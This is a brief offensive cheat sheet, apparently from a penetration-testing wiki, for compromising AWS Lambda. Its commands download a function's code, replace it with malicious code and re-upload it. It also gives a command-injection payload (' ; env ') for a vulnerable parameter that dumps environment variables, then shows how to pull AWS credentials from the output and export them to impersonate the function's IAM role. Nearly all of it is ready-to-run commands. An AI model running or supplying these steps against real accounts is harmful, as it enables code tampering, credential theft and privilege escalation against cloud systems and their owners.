Upload malicious code
Download lambda source code, unzip the archive alter the source code and create a new archive containing the malicious code
Copy wget $(aws lambda get-function --function-name "<function>" --query Code.Location --output text) -O "./source.zip"
mkdir dump
unzip "source.zip" -d ./dump
cd dump
<edit the source code>
zip -r ../compromised.zip ./*
Upload the source code
Copy aws lambda update-function-code --region <region> --function-name <function> --zip-file fileb://compromised.zip
Run code
Copy aws lambda invoke --function-name <function> output.json
Run with parameters. Use the payload switch and specify your parameters inside a json file stored on your local machine or in the home folder of AWS Cli session
Copy aws lambda invoke --function-name <function> --payload fileb://<path>.json output.json
RCE to IAM Role Compromise
Create a payload json file like follows
Copy {
"<vunerable param>": " ; env "
}
Invoke Lambda function with specified payload and store output in json file
Copy aws lambda invoke --function-name <function name> --payload fileb://payload.json output.json
Search for credentials in output
Copy cat output.json | jq -r . | grep AWS
Configure local account to impersonate role
Copy export AWS_SESSION_TOKEN=<session token>
export AWS_SECRET_ACCESS_KEY=<access key value>
export AWS_ACCESS_KEY_ID=<access key name>
Last updated 8 months ago